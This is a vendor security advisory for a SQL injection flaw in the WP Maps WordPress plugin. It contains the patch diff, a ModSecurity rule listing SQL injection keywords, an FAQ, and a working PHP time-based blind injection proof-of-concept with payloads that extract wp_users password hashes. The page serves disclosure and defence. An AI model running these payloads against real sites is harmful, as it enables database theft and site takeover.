-			$entityID = intval( $_POST['entityID'] ?? 0 );
-			$where    = $entityID > 0 ? array( $this->unique => $entityID ) : '';
-
-			$data   = apply_filters( 'wpgmp_route_save', $data, $where );
-			$result = FlipperCode_Database::insert_or_update( $this->table, $data, $where );
-
-			$response = array();
-			if ( false === $result ) {
-				$response['error'] = esc_html__( 'Something went wrong. Please try again.', 'wp-google-map-plugin' );
-			} elseif ( $entityID > 0 ) {
-				$response['success'] = esc_html__( 'Route was updated successfully.', 'wp-google-map-plugin' );
-			} else {
-				$response['success'] = esc_html__( 'Route was added successfully.', 'wp-google-map-plugin' );
-			}
-			$response['last_db_id'] = $result;
-
-			do_action( 'wpgmp_after_route_save', $response, $data, $entityID );
-
-			return $response;
+
 		}

 		public function delete() {
-			if ( isset( $_GET['route_id'] ) ) {
-				$id         = intval( wp_unslash( $_GET['route_id'] ) );
-				$connection = FlipperCode_Database::connect();
-				$query      = $connection->prepare( "DELETE FROM $this->table WHERE $this->unique = %d", $id );
-				$result     = FlipperCode_Database::non_query( $query, $connection );
-
-				do_action( 'wpgmp_after_route_deleted', $id, $result );
-				return $result;
-			}
-			return false;
+
 		}
 	}
 }
 No newline at end of file
--- a/wp-google-map-plugin/wp-google-map-plugin.php
+++ b/wp-google-map-plugin/wp-google-map-plugin.php
@@ -7,7 +7,7 @@
  * Author URI: https://weplugins.com/
  * License: GPL v2 or later
  * License URI: https://www.gnu.org/licenses/gpl-2.0.html
- * Version: 4.9.1
+ * Version: 4.9.2
  * Text Domain: wp-google-map-plugin
  * Domain Path: /lang
 */
@@ -74,7 +74,6 @@
 			add_action( 'widgets_init', 				  [ $this, 'wpgmp_google_map_widget'] );
 			add_action( 'wp_enqueue_scripts', 			  [ $this, 'wpgmp_frontend_scripts'] );
 			add_action( 'wp_ajax_wpgmp_ajax_call', 		  [ $this, 'wpgmp_ajax_call'] );
-			add_action( 'wp_ajax_nopriv_wpgmp_ajax_call', [ $this, 'wpgmp_ajax_call'] );

 			add_filter( 'media_upload_tabs', 			  [ $this, 'wpgmp_google_map_tabs_filter']);
 			add_filter( 'fc-dummy-placeholders', 		  [ $this, 'wpgmp_apply_placeholders'] );
@@ -233,23 +232,38 @@
 			}
 		}

-		function wpgmp_return_final_capability($cap){
+		function wpgmp_return_final_capability( $cap ) {

-			if ( current_user_can('administrator') ) {
+			global $wpdb;
+			if ( current_user_can( 'administrator' ) ) {
 				return $cap;
 			}
-			// phpcs:ignore WordPress.Security.NonceVerification.Recommended -- Reading page parameter for checking capability only
-			$frontend_page = ( !is_admin() && isset( $_GET['location_id'] ) && !empty( $_GET['location_id'] ) && isset($_GET['doaction']) && !empty($_GET['doaction']) && isset($_GET['cap']) && !empty($_GET['cap']) && $_GET['cap'] == 'wpgmp_manage_location' ) ? true : false;
-			// phpcs:ignore WordPress.Security.NonceVerification.Recommended -- Reading page parameter for checking capability only
-			$backend_page = ( is_admin() && isset( $_GET['location_id'] ) && !empty( $_GET['location_id'] ) && isset($_GET['doaction']) && !empty($_GET['doaction']) && isset($_GET['page']) && !empty($_GET['page']) && $_GET['page'] == 'wpgmp_manage_location' ) ? true : false;
-
-			if($frontend_page || $backend_page){
-
-				$model_factory = new WPGMP_Model();
-				$location_obj = $model_factory->create_object( 'location' );
-				$location_data = $location_obj->fetch( array( array( 'location_id', '=', $_GET['location_id'] ) ) );
-				if(get_current_user_id() != $location_data[0]->location_author){
-					$cap = '';
+
+			// Sanitize GET values
+			$location_id = isset( $_GET['location_id'] ) ? absint( sanitize_text_field( $_GET['location_id'] ) ) : '';
+			$doaction    = isset( $_GET['doaction'] ) ? sanitize_text_field( wp_unslash( $_GET['doaction'] ) ) : '';
+			$get_cap     = isset( $_GET['cap'] ) ? sanitize_text_field( wp_unslash( $_GET['cap'] ) ) : '';
+			$page        = isset( $_GET['page'] ) ? sanitize_text_field( wp_unslash( $_GET['page'] ) ) : '';
+
+
+			$backend_page = (
+				is_admin() &&
+				! empty( $location_id ) &&
+				! empty( $doaction ) &&
+				$page === 'wpgmp_manage_location'
+			) ? true : false;
+
+			if ( $backend_page ) {
+
+				$location_data = $wpdb->get_results( $wpdb->prepare(
+				    "SELECT * FROM {$wpdb->prefix}map_locations WHERE location_id = %d",
+				    intval( $location_id )
+				) );
+
+				if ( ! empty( $location_data ) && isset( $location_data[0]->location_author ) ) {
+					if ( get_current_user_id() !== (int) $location_data[0]->location_author ) {
+						$cap = '';
+					}
 				}
 			}

@@ -1351,7 +1365,7 @@

 			if ( is_admin() )
 			$this->wpgmp_define( 'WPGMP_SLUG', 'wpgmp_view_overview' );
-			$this->wpgmp_define( 'WPGMP_VERSION', '4.9.1' );
+			$this->wpgmp_define( 'WPGMP_VERSION', '4.9.2' );
 			$this->wpgmp_define( 'WPGMP_FOLDER', basename( dirname( __FILE__ ) ) );
 			$this->wpgmp_define( 'WPGMP_DIR', plugin_dir_path( __FILE__ ) );
 			$this->wpgmp_define( 'WPGMP_ICONS_DIR', WPGMP_DIR . '/assets/images/icons/' );

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-2580
# Blocks SQL injection via orderby parameter in WP Maps plugin admin pages
SecRule REQUEST_URI "@rx ^/wp-admin/(admin.php|admin-ajax.php)" 
  "id:10002580,phase:2,deny,status:403,chain,msg:'CVE-2026-2580: WP Maps SQL Injection via orderby parameter',severity:'CRITICAL',tag:'CVE-2026-2580',tag:'WordPress',tag:'WP-Maps',tag:'SQLi'"
  SecRule &ARGS_GET:page "@gt 0" "chain"
    SecRule ARGS_GET:page "@rx ^wpgmp_" "chain"
      SecRule &ARGS_GET:orderby "@gt 0" "chain"
        SecRule ARGS_GET:orderby "@rx (?i)(?:sleeps*(|benchmarks*(|pg_sleeps*(|waitfors+delays+|unions+select|selects+.*from|inserts+into|updates+.*set|deletes+from|drops+table|creates+table|execs*(|xp_cmdshell|load_files*(|intos+outfile|intos+dumpfile|@@version|information_schema|column_names+from|--|#|/*.**/|`[^`]*`[^,)]|b(?:and|or)s+[dw]+s*[=<>]|bcases+whenb)" 
          "setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',setvar:'tx.anomaly_score=+%{tx.critical_anomaly_score}'"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-2580 - WP Maps – Store Locator,Google Maps,OpenStreetMap,Mapbox,Listing,Directory & Filters <= 4.9.1 - Unauthenticated SQL Injection via 'orderby' Parameter

<?php
/**
 * Proof of Concept for CVE-2026-2580
 * Unauthenticated SQL Injection in WP Maps Plugin
 *
 * This script demonstrates time-based blind SQL injection via the orderby parameter.
 * Requires the WP Maps plugin (<= 4.9.1) to be installed and active.
 */

$target_url = 'http://vulnerable-wordpress-site.com/wp-admin/admin.php';
$page = 'wpgmp_manage_location'; // Plugin admin page that uses WPGMP_Tabular

// Time-based SQL injection payload
// Uses SLEEP() to demonstrate blind injection
$payloads = [
    // Basic time delay test
    'orderby' => "location_id,(SELECT SLEEP(5))--",
    'order' => 'asc',
    'page' => $page
];

function send_request($url, $params) {
    $ch = curl_init();
    
    // Build query string
    $query_string = http_build_query($params);
    $full_url = $url . '?' . $query_string;
    
    curl_setopt($ch, CURLOPT_URL, $full_url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HEADER, false);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    
    // Set WordPress cookies if available (not required for unauthenticated)
    // curl_setopt($ch, CURLOPT_COOKIE, 'wordpress_test_cookie=WP+Cookie+check');
    
    $start_time = microtime(true);
    $response = curl_exec($ch);
    $end_time = microtime(true);
    
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    
    return [
        'time' => $end_time - $start_time,
        'code' => $http_code,
        'response' => $response
    ];
}

// Test 1: Normal request for baseline timing
$baseline_params = [
    'orderby' => 'location_id',
    'order' => 'asc',
    'page' => $page
];

// Test 2: Malicious request with SLEEP payload
$malicious_params = $payloads;

echo "[+] Testing CVE-2026-2580 - WP Maps SQL Injectionn";
echo "[+] Target: $target_urln";
echo "[+] Page: $pagenn";

echo "[1] Sending baseline request...n";
$baseline = send_request($target_url, $baseline_params);
echo "    Response time: " . round($baseline['time'], 2) . " secondsn";
echo "    HTTP Code: " . $baseline['code'] . "nn";

echo "[2] Sending malicious request with SLEEP(5)...n";
$malicious = send_request($target_url, $malicious_params);
echo "    Response time: " . round($malicious['time'], 2) . " secondsn";
echo "    HTTP Code: " . $malicious['code'] . "nn";

// Check for time-based injection indicator
$time_difference = $malicious['time'] - $baseline['time'];

if ($time_difference > 4) { // Account for network variance
    echo "[!] VULNERABLE: Significant time delay detected (" . round($time_difference, 2) . " seconds)n";
    echo "    SQL Injection confirmed via orderby parameter.n";
    
    // Example of data extraction payload structure
    echo "n[+] Example data extraction payloads:n";
    echo "    orderby=location_id,(SELECT IF(SUBSTRING(user_pass,1,1)='a',SLEEP(5),0) FROM wp_users WHERE ID=1)--n";
    echo "    orderby=location_id,(SELECT CASE WHEN (SELECT COUNT(*) FROM wp_users)>0 THEN SLEEP(5) ELSE 0 END)--n";
} else {
    echo "[-] NOT VULNERABLE: No significant time delay detectedn";
    echo "    Site may be patched or plugin not active.n";
}

// Additional check for error messages
if (strpos($malicious['response'], 'SQL syntax') !== false || 
    strpos($malicious['response'], 'database error') !== false) {
    echo "n[!] SQL error messages detected in responsen";
}

?>

Frequently Asked Questions

What is CVE-2026-2580?
Overview of the vulnerability
CVE-2026-2580 is a high-severity SQL injection vulnerability found in the WP Maps – Store Locator plugin for WordPress. It allows unauthenticated attackers to exploit the ‘orderby’ parameter to execute arbitrary SQL queries, potentially leading to sensitive data extraction.
How does the SQL injection work?
Mechanism of exploitation
The vulnerability arises from insufficient input validation in the plugin’s SQL query construction. Attackers can manipulate the ‘orderby’ parameter in HTTP GET requests to inject SQL commands, allowing them to extract information from the database using time-based blind SQL injection techniques.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the WP Maps – Store Locator plugin version 4.9.1 or earlier is vulnerable. Administrators can check their plugin version in the WordPress dashboard under the Plugins section.
How can I check if my site is vulnerable?
Steps for verification
To verify if your site is vulnerable, check the version of the WP Maps plugin installed. If it is version 4.9.1 or lower, your site is at risk. Additionally, you can review logs for suspicious requests to admin pages.
What steps should I take to mitigate this vulnerability?
Recommended actions
To mitigate this vulnerability, update the WP Maps plugin to version 4.9.2 or later, where the issue has been patched. Regularly check for plugin updates and apply them promptly to maintain security.
What does the CVSS score of 7.5 indicate?
Understanding the severity rating
A CVSS score of 7.5 indicates a high severity level, meaning that the vulnerability poses a significant risk to the system. It suggests that successful exploitation could lead to severe consequences, including data breaches.
What kind of data could be compromised?
Potential data exposure
Successful exploitation of this vulnerability could allow attackers to access sensitive information stored in the WordPress database, including user credentials, plugin settings, and location data.
What is a proof of concept (PoC) in this context?
Demonstration of the vulnerability
A proof of concept (PoC) demonstrates how the SQL injection vulnerability can be exploited. The provided PoC script shows how an attacker can send crafted requests to the vulnerable plugin to execute SQL commands and extract data.
Is remote code execution possible through this vulnerability?
Limitations of the vulnerability
While direct remote code execution is unlikely through this SQL injection vector, gaining database access can lead to other security issues such as privilege escalation and full site takeover.
What are time-based blind SQL injection techniques?
Explaining the exploitation method
Time-based blind SQL injection techniques involve sending SQL queries that cause a delay in response, such as using the SLEEP() function. By measuring the response time, an attacker can infer whether their payload was successful.
How can I prevent similar vulnerabilities in the future?
Best practices for security
To prevent similar vulnerabilities, ensure proper input validation and sanitization in your code. Regularly audit your plugins and themes for security issues, and stay informed about vulnerabilities affecting your WordPress site.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updates are not possible, consider disabling the WP Maps plugin until a patch can be applied. Additionally, monitor your site for unusual activity and restrict access to admin pages to trusted users only.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations